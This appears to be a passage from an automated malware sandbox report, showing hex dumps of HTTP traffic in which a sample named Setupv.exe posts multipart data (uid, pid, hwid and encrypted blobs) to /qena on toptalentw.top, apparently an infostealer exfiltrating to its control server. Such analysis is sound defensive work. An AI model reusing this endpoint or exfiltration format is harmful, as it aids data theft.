                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: a4 97 29 bf fe ad f4 5e 5d 51 ae 5e e4 8b 3f 35 64 39 8a f6 3e 38 4d 57 b0 33 1d 1d 71 28 a8 47 b6 23 c8 32 43 93 ff b0 fe c1 d8 3a 29 40 f3 97 4b 59 48 ee 36 8d 5d 04 73 9c 90 0e 5f b6 7f 49 16 4f 66 de 72 87 14 7f c7 6d a7 97 e1 77 a9 37 bd 98 00 bc ec 4f 30 87 16 29 8c ad 61 4b 65 af c2 c7 fc 45 0b 72 a2 e2 1d 44 12 a0 15 bd e6 25 91 d1 7d 42 01 61 10 09 1c bc 18 40 51 19 9b ce 52 1e e2 13 f5 94 bc 7f 42 cd 22 8b fe bd 9b 38 1a 13 e5 07 a2 59 c2 7a 29 74 3c b8 94 51 28 e1 21 b3 6a 5c 93 78 ce 5c b8 91 b0 09 4a ad 50 7f 1e c2 1f e2 c2 4f 3a 54 6a f1 e3 5d f7 e9 40 b5 c0 a7 38 11 55 28 2c 6d d7 29 f9 2b 90 08 89 2a b8 c0 72 78 32 c5 14 19 d0 45 80 22 78 dd c1 c0 8e f4 12 83 7a 41 ac 9f ff bb 12 8c f0 4f c6 65 f0 ee a2 1d 9a df c3 5f 66 e7 f0 2e 19 24 22
                                                                                                                                                                                                                          Data Ascii: )^]Q^?5d9>8MW3q(G#2C:)@KYH6]s_IOfrmw7O0)aKeErD%}Ba@QRB"8Yz)t<Q(!j\x\JPO:Tj]@8U(,m)+*rx2E"xzAOe_f.$"
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: 8c 9f 2c bb cf 07 10 08 19 86 f2 af 1c 1d 79 dc ac c1 c6 f8 eb d0 6e 37 a7 45 49 61 02 7b dd dc 37 64 8d 10 27 dd bb 04 c1 b4 b2 50 94 30 79 e3 74 b7 37 1b 39 69 97 88 ac 53 ed 2c 2d cd d3 ed 7b 68 82 19 5c 51 29 cb 11 9f 60 a6 77 de 62 33 a1 97 6c a5 f2 89 89 0b 39 e6 a2 29 2f e0 d0 7a 15 14 05 a2 f2 71 f4 41 fa 39 80 5d a0 78 02 00 10 8a b4 d5 29 b5 92 2e d1 5e 48 8f ea 30 fe 88 92 e7 41 5b 01 06 d8 d0 43 a2 8e 8e 05 02 d6 d3 83 86 99 66 6e f9 c8 21 bf 5a 06 cf ac 99 fb ba a8 1a 2d de 10 bd 84 be 70 ca dd 04 33 18 6a e5 4c 43 3e d9 bf c6 b6 13 1b 15 82 9c 22 18 fc 18 2a d0 76 43 0e b0 04 9d e1 0e 96 96 4d 84 ef 82 98 be 43 d6 9a 8e de 4a c3 07 c1 8e e3 9e ff 46 fc c2 37 87 37 a1 2e 79 b3 c8 8c 2a 53 6f aa 9b d9 99 a9 0e 34 15 68 4f 56 aa 53 66 81 0a b3
                                                                                                                                                                                                                          Data Ascii: ,yn7EIa{7d'P0yt79iS,-{h\Q)`wb3l9)/zqA9]x).^H0A[Cfn!Z-p3jLC>"*vCMCJF77.y*So4hOVSf
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: 89 da 43 ef 03 13 85 93 a9 4f c7 91 d6 b4 ad b6 4b d5 d7 3c 5f 1e 11 fb 5b ae 0f 1f bd 6a a5 30 de 47 41 4a 17 4e 7c 1e a7 b1 d7 22 2d de 8d 3f 49 00 11 f0 c3 99 bb b1 e0 66 fc 2a fa 3b df 19 b8 39 f1 53 8f 65 5a 2f b5 37 46 ac 30 6c 1a 1d 1f 2f e6 f7 cf b3 17 58 36 11 76 fd df 79 59 f2 95 5d 4f 22 00 56 b8 3a 7e e8 f1 82 20 7c 84 22 14 3d a3 c9 b8 8e 94 cd 5d d1 62 9a 89 78 35 19 5e 83 18 e4 f1 1d 85 11 83 3e b6 38 ca fb 65 53 9c 24 41 c1 87 9c 74 4e 75 93 0f 20 c5 12 3d e3 1c d5 f3 c5 53 4e 92 83 5b de 4e 07 30 29 47 ce 47 8d e2 8e f1 1b 9e 5d 55 d3 8a e4 64 db 98 57 9a 61 32 9c c4 7f 3d 5c d6 b7 1f 00 c1 e3 b7 23 f5 18 ea 12 61 85 d9 f9 b3 2d a0 ff 3e 6c 22 45 66 bb d7 84 01 d3 d0 0e 7a e3 7d 92 32 36 15 76 14 36 5d 67 b4 4c 73 99 66 39 b6 3e 8c 19 19
                                                                                                                                                                                                                          Data Ascii: COK<_[j0GAJN|"-?If*;9SeZ/7F0l/X6vyY]O"V:~ |"=]bx5^>8eS$AtNu =SN[N0)GG]UdWa2=\#a->l"Efz}26v6]gLsf9>
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC1460INData Raw: 1e d5 1e 3b f3 60 73 17 fa 94 ac 2a 27 c8 10 a3 5c 59 9f 67 6c 9f 29 ae 64 31 2a a7 ad 9d 3a 3d 65 49 da b7 df 49 af 0e ee 09 f1 e5 74 11 9e 8a b2 0a b6 60 bd 04 8f b7 64 94 df c1 04 b5 47 57 73 f2 9c 30 cb ca aa a1 16 ea 97 b7 7e 8f 97 ba e1 fe de b9 a1 e5 23 64 b8 89 a9 e7 ee 3e 09 34 07 04 4d 29 66 23 4d c5 73 49 f0 e7 54 4b c2 4e b8 af 75 90 cd b7 cb a8 d3 0a 97 a5 d0 b9 85 52 01 b0 a6 56 17 f9 a7 f3 e3 97 b0 b8 7b 18 9b f7 dc 49 1c d0 8f 12 0c 07 8d 83 f7 41 64 4c 41 cf 79 09 6c 45 7d 30 89 73 68 dd 45 02 28 03 38 c6 b3 fe 5b 73 e2 c2 bb 99 9e 6c 59 3b e2 b4 c6 f6 30 99 db 4b 99 4a 9e 52 38 b9 86 e1 1e af a7 47 1c d5 1b 54 70 04 6e d7 29 9a ea a5 bf 57 0f f5 e9 f8 07 75 fa 79 4f 7b f6 00 41 4c 61 d5 c3 db 0c 2d fa 80 f8 a1 64 99 52 e4 a6 9d 85 25 f1
                                                                                                                                                                                                                          Data Ascii: ;`s*'\Ygl)d1*:=eIIt`dGWs0~#d>4M)f#MsITKNuRV{IAdLAylE}0shE(8[slY;0KJR8GTpn)WuyO{ALa-dR%
                                                                                                                                                                                                                          2025-04-28 17:34:52 UTC100INData Raw: ff 10 1a 80 a9 77 6b 96 de 24 2b c6 cf 33 df c4 d7 37 a2 96 59 81 e7 bd bc 38 8f c1 49 c2 ad fd 9b 52 65 d6 bb 2d 12 95 af c3 6e 63 24 0d 18 f6 00 8f dd ac d8 3e 44 14 96 94 68 ae f5 85 24 17 67 9f da ee 1e f9 0c 9a 8c 92 52 12 c9 2b d2 e5 5f 4d 90 f3 5f aa 39 09 81 42 d6 2e b3 d4 7c 8c 3e ab 53 de
                                                                                                                                                                                                                          Data Ascii: wk$+37Y8IRe-nc$>Dh$gR+_M_9B.|>S
                                                                                                                                                                                                                          2025-04-28 17:34:53 UTC281OUTPOST /qena HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=n2O6r5Alv1GWjGKnMf
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 14929
                                                                                                                                                                                                                          Host: toptalentw.top
                                                                                                                                                                                                                          2025-04-28 17:34:54 UTC289INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Mon, 28 Apr 2025 17:34:54 GMT
                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          CF-RAY: 9378501ffed047fd-DFW
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          Content-Length: 70


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          3192.168.2.549700104.21.36.1334437840C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC280OUTPOST /qena HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=MjYU1bfK4GdCYGj81
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 15073
                                                                                                                                                                                                                          Host: toptalentw.top
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 2d 2d 4d 6a 59 55 31 62 66 4b 34 47 64 43 59 47 6a 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 0d 0a 2d 2d 4d 6a 59 55 31 62 66 4b 34 47 64 43 59 47 6a 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 6a 59 55 31 62 66 4b 34 47 64 43 59 47 6a 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: --MjYU1bfK4GdCYGj81Content-Disposition: form-data; name="uid"9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c--MjYU1bfK4GdCYGj81Content-Disposition: form-data; name="pid"2--MjYU1bfK4GdCYGj81Content-Disposition: form-data; name="hwid"
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 42 fd 2a d1 56 91 9e b2 63 8f a3 ec e7 d8 c5 5f 8d 5d 63 dd e0 6f 9c b7 6a c3 86 d4 68 6a 6a d1 88 9b 1e 52 a4 27 ef f7 79 17 16 66 17 ca 8a 91 22 07 1b fb 92 ab 2a b1 81 3e 94 5a 77 d2 6d 82 49 80 f5 b2 7a a1 48 ee 88 60 52 cd 13 d6 86 a4 23 e0 f7 01 60 28 3f 1c 30 39 4d ef ea 4d 79 9d 92 22 79 20 36 40 99 97 cb 8a c6 96 5b ea 8f 1b 8b 51 a1 cd 84 88 9f 3f 05 2f bb 55 2e c6 90 15 48 bd c0 56 4a 3e 7f 89 38 bd a7 f2 7b 91 3d 7c 1b 4b 74 41 91 25 58 bd ea c2 0c be 4d 39 b4 59 07 67 6d 9f 1d 73 da 93 0f 73 ad 05 70 e5 5c d2 d4 d1 0c c2 4a 20 30 fa d3 a2 31 9d c5 56 23 53 1d c9 96 3a bc 30 b8 6b 9f 34 34 87 33 4c 2d 7f 09 81 be 46 3a 9f 4b 90 1e d3 70 0b e3 d7 cc 90 e8 7b b1 69 35 6e ab 89 9f a3 5b 44 a2 41 a0 de 17 a6 59 ad d9 20 e4 ec 29 3c 77 b8 2d e0 6e
                                                                                                                                                                                                                          Data Ascii: B*Vc_]cojhjjR'yf"*>ZwmIzH`R#`(?09MMy"y 6@[Q?/U.HVJ>8{=|KtA%XM9Ygmssp\J 01V#S:0k443L-F:Kp{i5n[DAY )<w-n
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: af 02 af be f1 14 73 fc f9 aa d3 ef cb 03 66 c8 2e ab 2a b1 c7 e4 06 67 47 c0 8a f8 20 f8 11 62 7c c5 fa 2d cc 31 61 0f 24 13 16 47 7d b4 93 ba 96 5e 5c fb e1 b5 9a b7 65 1c eb 3b dd b8 c2 1d f0 d1 6e 03 14 20 90 d6 fe 7b 45 c2 e2 15 17 d2 29 43 8b d3 ca 3c 88 c8 ef 8d 3f 34 f5 67 cf 6b a7 2c d9 86 7f 18 e8 48 b4 ee 48 a9 6f 17 ee 12 3e a7 a9 b5 fd aa 6f 52 99 8c fe f7 05 fa cf 4f 32 96 1f 49 7c 81 f5 8a 0d d1 1f 5c 27 3d 19 b3 26 e0 08 70 0a 1c b8 38 13 db 2c 7d 47 1c 04 3a ad b8 80 67 f9 9a 78 9a 88 2c cc 15 f7 45 db 10 3e 4e bd b5 b1 90 fa 67 32 ca c0 2e d1 bc 86 52 f1 70 d7 ef e2 93 5d 0d 0d c0 2a 1e bb c3 23 f8 0d 6c 02 09 3a 21 ce 50 2b b5 13 c8 a9 ff 6e 1b 74 8c 1e ae a4 e2 55 64 a8 6b 6f 87 18 b8 8d dc 02 6b 04 67 76 16 bf 68 af b3 8c f6 13 94 76
                                                                                                                                                                                                                          Data Ascii: sf.*gG b|-1a$G}^\e;n {E)C<?4gk,HHo>oRO2I|\'=&p8,}G:gx,E>Ng2.Rp]*#l:!P+ntUdkokgvhv
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 5e 47 c7 cd d2 97 ca c1 79 3d ed 67 ff 00 a4 04 90 a6 af 47 51 23 ea 85 7f af 15 b8 62 87 f7 8b 45 a7 18 9b 83 76 e4 3a 5c 5d 48 fb 79 ec c7 cb f9 48 bc 3e 9d ad 19 c9 88 de ca 3b ab 29 13 9c 7c e9 df c9 f8 29 9c 88 2e 24 84 57 84 46 52 43 08 ba dc 86 87 bf da f0 ab a1 da 7e bc cc 42 e5 8c a1 d5 17 57 50 f5 8e 4d eb 7e 44 ac 9e 62 47 0c 84 f8 96 0c 72 3a f9 68 8e 4a 1d c0 69 63 0f 88 2b 3a ca 46 66 d4 45 db 22 41 26 b3 9d 05 6b 91 61 8b ae d3 20 e0 39 75 bd 0a b7 35 4a fe fe 4e 6f fa 83 50 ce 18 2d fa 63 9c 23 b7 9b da 08 ce 6c 3b e3 8f 6c b8 19 9c c4 81 c9 6f ac 9b 0b a5 65 b9 db 0e 02 09 c0 da 6a f4 52 73 44 38 9a d6 52 b6 8f 3f 2e c0 61 01 d3 01 c0 40 85 52 af f4 e0 e6 b0 0f c9 65 0c 5e 69 ba 13 18 63 b4 03 57 3d d7 d4 6a f4 a6 8c 2a ee b1 9d a0 87 ec
                                                                                                                                                                                                                          Data Ascii: ^Gy=gGQ#bEv:\]HyH>;)|).$WFRC~BWPM~DbGr:hJic+:FfE"A&ka 9u5JNoP-c#l;loejRsD8R?.a@Re^icW=j*
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 1a ad 70 5b d0 18 cf 19 54 3d bc 20 65 9f 14 c3 65 93 17 49 a8 3f a9 14 bf 94 cc ac 52 91 9c 40 5f 36 bf 28 6e fd 1a 86 5f 32 4f df 58 e1 32 f0 ea 46 ad 7a cb ec 77 40 97 db b5 ad e5 4d 61 12 89 76 aa 3a a0 63 de 1e 23 09 c8 0a 54 d1 46 90 a9 e8 7b dd 1b 54 f2 9d 53 63 d6 f7 c0 2a 13 b0 22 d0 5f 7d e2 07 45 35 fa 15 6d 5a f9 25 10 c0 dc f6 35 5c af 40 16 9f 03 72 b3 ec cc 49 d9 67 32 d8 05 be 54 ad 57 4c 76 f1 62 15 a6 b0 06 06 ab 87 c7 73 88 4d 73 ba c6 87 7f 12 b3 3f 6d 67 4b 04 b0 a3 a4 4e 7c 72 dc 55 9d 36 3b 18 c4 9d 92 78 fc ab 8a 42 eb dd 66 75 50 93 fb 8b 59 29 0a e8 08 e2 2a 3c b6 0f fb 1f 34 e8 ce e4 6f 8c fa 38 10 ab a2 d4 63 3b f5 fb c3 c7 8a d1 4e 3a 01 a2 ab 08 be 99 4f 62 6d 96 a1 93 73 de 70 d3 fd ad ba 84 2a ab cd 97 10 b4 5b b4 14 5b ae
                                                                                                                                                                                                                          Data Ascii: p[T= eeI?R@_6(n_2OX2Fzw@Mav:c#TF{TSc*"_}E5mZ%5\@rIg2TWLvbsMs?mgKN|rU6;xBfuPY)*<4o8c;N:Obmsp*[[
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: d1 70 d3 d1 e3 e5 c8 5c 37 dd 5a bb 5d 5f a7 77 3a cd 6c 88 98 68 db d5 dd ce ee a4 ec d1 d9 98 e2 40 d3 2d 81 ce 4a 48 09 ee 39 39 24 a4 b1 0a 0a 48 50 66 1b 5a f9 bc eb aa 5f 6e b4 5d 47 af 66 34 14 58 ff a6 98 b5 40 b6 61 21 64 e0 6a d1 96 84 46 73 53 49 5c 23 d4 bf 84 a6 a9 5f ca af 27 fb fc ab 8f 48 0e 35 04 5b 24 11 4a 48 d1 7c a7 5b 49 51 78 99 4b 70 73 5e 8a 33 a9 1d 1e 1d b2 be 73 08 15 87 2e fa c6 2d b4 5c 4f 8d 0c 8e 5f d4 10 01 f5 61 9e 2c b0 a4 ee ad 48 e6 88 5b 59 21 9e b2 42 a8 4f ae af d8 61 21 89 10 20 56 c1 19 e8 db 6f c2 be 09 a1 85 8b 83 6f 36 93 7c 31 39 95 27 9f 33 c9 d4 a4 0a 22 49 df f2 02 d4 14 b9 2b b6 cc 9f d7 80 ac b4 55 4d fe 99 78 26 be 25 ce ff 82 4d 3e 69 7c 8d 14 5f 6c ec 51 93 fa 7f dd a7 43 6f 7c df a5 06 50 af f9 75 5e
                                                                                                                                                                                                                          Data Ascii: p\7Z]_w:lh@-JH99$HPfZ_n]Gf4X@a!djFsSI\#_'H5[$JH|[IQxKps^3s.-\O_a,H[Y!BOa! Voo6|19'3"I+UMx&%M>i|_lQCo|Pu^
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: c9 88 e3 0e 83 d9 ec 90 b1 07 e0 30 c6 92 fa 4f 52 6c 8f 83 9f 7d a2 d4 ce 90 f0 72 8b ea e9 ea 3f a1 3e 44 bc 43 0b 39 28 d3 0f e5 b2 54 cc 00 a6 25 cd 16 0b 40 13 99 60 06 ac 46 5e 04 03 ef 7c 57 be 05 39 66 34 65 c1 a5 c2 b8 55 af e2 0e 32 19 64 53 cc 53 81 db 16 ec 06 0f 86 ec f4 de 69 22 b5 89 9d 44 00 5a c5 e3 35 00 a9 de 77 52 7a 82 40 69 54 ab 0a 80 3b a0 f1 59 12 46 fe 73 8a 2b a7 b3 d7 23 bd 69 1f cc 61 c6 74 da b9 89 54 8a e2 d2 2c 56 0d 7a 7a 0a 95 1d 2a 4b 2c ba 77 85 14 ee c1 02 72 fd ac cf 63 5d cc ce e1 39 5f c0 b8 df ee 56 45 60 8d a4 ab 45 a4 fb e6 fc 2f 41 d3 90 bd 32 9d d2 b7 2a 19 0e 53 47 6b 1b bb 9b 89 14 07 10 ca 05 7a 7d 98 a6 3b 25 47 8a 7d 41 2c 13 59 57 84 fd 04 9a 97 6f 5a c7 d9 66 41 11 61 b3 6e 99 94 48 f9 fb 56 90 f1 56 27
                                                                                                                                                                                                                          Data Ascii: 0ORl}r?>DC9(T%@`F^|W9f4eU2dSSi"DZ5wRz@iT;YFs+#iatT,Vzz*K,wrc]9_VE`E/A2*SGkz};%G}A,YWoZfAanHVV'
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: ea 7b 2b d5 d5 4f 81 0a 24 9e a6 d2 ac 8b 9d d3 df 60 0d 52 f0 af e1 d4 11 57 19 6b d4 53 c7 05 f5 54 24 83 26 70 81 ac 3a 1c fc ce 24 2c d4 31 ed ea 7e 21 23 b6 eb cb 5a 1e af c8 6b 40 d1 e1 b3 29 d4 03 eb 93 73 58 5c d4 64 77 f1 28 a5 5c f5 0a 68 e5 1e 47 c5 a5 ff 95 77 51 3e cf a9 85 93 9f 75 0f c0 72 42 d3 da a1 69 ab 8b cf 9b 87 5a 5a 48 7d 87 5b f4 2f dd f5 60 ba 20 d3 cf a3 3f 05 2f bb 7b 79 c0 94 b4 d6 4f c9 70 43 10 ad 54 38 e6 3b 78 53 a3 89 ee 40 75 8f 79 3b 49 15 77 f9 0b 03 65 30 0e 50 73 f9 56 63 8e 60 9d dd 94 07 bc 30 2e 50 da dd f5 26 af 59 42 72 60 88 22 e9 26 3b 2c 63 eb 1d 4e de d3 58 8e 56 8b 86 1a d3 7e 2d 7e 21 0e 42 ea 98 cc 84 af c2 98 1a 23 63 98 58 7a 9f 85 3d 03 bd 9f 35 9c e8 e0 b9 03 d6 77 eb f0 83 b0 b1 6a cd d6 06 00 5b 7f
                                                                                                                                                                                                                          Data Ascii: {+O$`RWkST$&p:$,1~!#Zk@)sX\dw(\hGwQ>urBiZZH}[/` ?/{yOpCT8;xS@uy;Iwe0PsVc`0.P&YBr`"&;,cNXV~-~!B#cXz=5wj[
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: a4 3f ff da 9a c1 2f 1c 06 27 85 8c ec 91 33 66 5e ca ee f5 02 58 01 34 f6 8f cd 6a bd a5 b0 8b c9 46 56 0e 99 c4 05 61 c5 03 d0 10 b1 bd f9 88 54 83 85 8a 8f 79 c0 d8 02 49 59 ac 56 f9 1f cd ea 32 e8 2b 1a 3c 25 5e 0d 33 40 c3 67 30 77 de 04 67 01 7f 0c 85 34 02 34 35 c1 b6 68 f4 13 32 6d ad 18 fa ac 6e 9a 35 2b d1 48 a9 ba 89 a7 3a 77 de 5c cb e1 19 35 f1 14 e1 ef ce d7 28 5c a8 84 c5 77 56 6e d1 a6 32 60 ce 18 b2 2d 1b 3d c5 de a6 b1 17 d2 6f 5b 17 54 4d 3e e4 bc fa f6 a8 4d 9a a2 f7 d6 9a 74 c7 39 59 84 1e b1 d0 4e ee eb a5 73 57 e7 ec 7e f9 fd 2b 8c 8b b0 90 be 73 6a 7c 2d 55 92 b1 4f e5 67 2c cb 0b 02 22 94 80 33 33 ed 77 6b b1 ce 8e 20 c1 2c 96 a6 60 81 fc 58 d5 b8 c8 0b 4b 2e 12 95 16 84 ab 23 31 09 76 00 90 b8 83 f1 51 0d e9 4c ab d7 09 13 28 f7
                                                                                                                                                                                                                          Data Ascii: ?/'3f^X4jFVaTyIYV2+<%^3@g0wg445h2mn5+H:w\5(\wVn2`-=o[TM>Mt9YNsW~+sj|-UOg,"33wk ,`XK.#1vQL(
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC1460OUTData Raw: 4e 26 2d d2 19 c5 87 10 d2 f5 2f 89 67 b8 00 0f 6b 2d b0 e0 8a ba 04 53 0d 94 22 eb 66 08 07 e5 0c 76 8d 6d f9 24 3c 2b b0 a7 b9 15 d4 c1 24 2e 88 60 35 92 8c 18 25 d0 22 d6 95 86 37 bc dd 3d 38 fa 38 11 08 52 61 00 9c 3b 77 62 3d cb ea ad 7b 8b 83 ce ee 5d 29 77 0e 76 dc b7 63 3b b6 66 62 09 63 5f 97 36 b1 45 5e bc ac d7 f4 92 7e 88 46 05 ec 4b 74 b4 44 ea 5c 26 0c 51 f1 d7 4d 90 14 05 76 12 7c 40 15 e1 3e a2 67 d0 39 69 78 fc 1e 05 30 76 11 f6 87 85 e7 c3 19 9c ff 0d e3 49 b0 48 28 1f 01 76 90 7d 88 a3 1d 40 40 d3 26 c9 63 28 e2 b9 d7 5b 69 b7 08 4e f7 92 81 7f 94 c4 31 a1 9d 32 f9 57 74 26 8a 85 ff 1f 2d 6e 60 b2 dd 4e 42 3b 9a f1 69 1f eb 26 6b 58 69 47 18 04 b7 aa be 4c 19 d2 b1 71 f2 69 e2 ab 96 6b 48 f9 ac b6 f7 95 33 aa a0 c7 c7 88 fa f6 6c 7f d9
                                                                                                                                                                                                                          Data Ascii: N&-/gk-S"fvm$<+$.`5%"7=88Ra;wb={])wvc;fbc_6E^~FKtD\&QMv|@>g9ix0vIH(v}@@&c([iN12Wt&-n`NB;i&kXiGLqikH3l
                                                                                                                                                                                                                          2025-04-28 17:34:55 UTC289INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Mon, 28 Apr 2025 17:34:55 GMT
                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          CF-RAY: 9378502bdccd477c-DFW
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          Content-Length: 70


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          4192.168.2.549701104.21.36.1334437840C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC280OUTPOST /qena HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=7tfr7jpx9ESjC6xCI
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 20562
                                                                                                                                                                                                                          Host: toptalentw.top
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: 2d 2d 37 74 66 72 37 6a 70 78 39 45 53 6a 43 36 78 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 0d 0a 2d 2d 37 74 66 72 37 6a 70 78 39 45 53 6a 43 36 78 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 74 66 72 37 6a 70 78 39 45 53 6a 43 36 78 43 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: --7tfr7jpx9ESjC6xCIContent-Disposition: form-data; name="uid"9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c--7tfr7jpx9ESjC6xCIContent-Disposition: form-data; name="pid"3--7tfr7jpx9ESjC6xCIContent-Disposition: form-data; name="hwid"
                                                                                                                                                                                                                          2025-04-28 17:34:56 UTC1460OUTData Raw: 8b 2f 7a d5 7d e6 9e 0b d5 5e d0 e2 d8 d6 ff 1f af 1c f3 cb 00 ce 78 7c 98 06 df c0 97 db ea fc 22 ed ec ad eb 5f bf 42 22 c0 c9 c5 10 32 27 2b ed 37 97 1f c6 62 59 76 5e d8 45 86 e8 4c cf 21 21 cd 66 c6 8d 1c 43 59 3c bb 4d 84 f2 85 8b e4 55 d2 7c 43 46 d6 12 20 72 3f f4 91 33 4e cc 73 f3 a4 a2 66 9f ab 08 cb 20 91 04 69 7a d8 3b 81 1f 40 0a 18 31 12 24 5b f5 57 e5 5c e9 08 64 93 a1 8d 85 98 19 e7 a5 40 be e6 a5 ec 3c 8d df 0a b1 cf c7 0c 92 43 0c 64 3c 76 e7 0e 22 89 c3 74 13 f5 7f a1 51 98 9c a3 2f 2c fc 7e de cd 1b 7c 55 76 3c 38 53 0d 90 3a 4d 34 60 e5 0d d8 09 c8 ee bd 18 94 51 29 a1 71 b0 1c 9a 96 62 98 0b a4 74 ca 3e 67 cd ca c3 13 4f 28 c4 dc ad 63 90 66 aa 64 56 1e 1e 3a df 31 19 40 33 70 2a 8e cf 97 e8 c1 9e 98 c3 d0 f4 e3 a2 e1 b1 20 23 53 2d
                                                                                                                                                                                                                          Data Ascii: /z}^x|"_B"2'+7bYv^EL!!fCY<MU|CF r?3Nsf iz;@1$[W\d@<Cd<v"tQ/,~|Uv<8S:M4`Q)qbt>gO(cfdV:1@3p* #S-
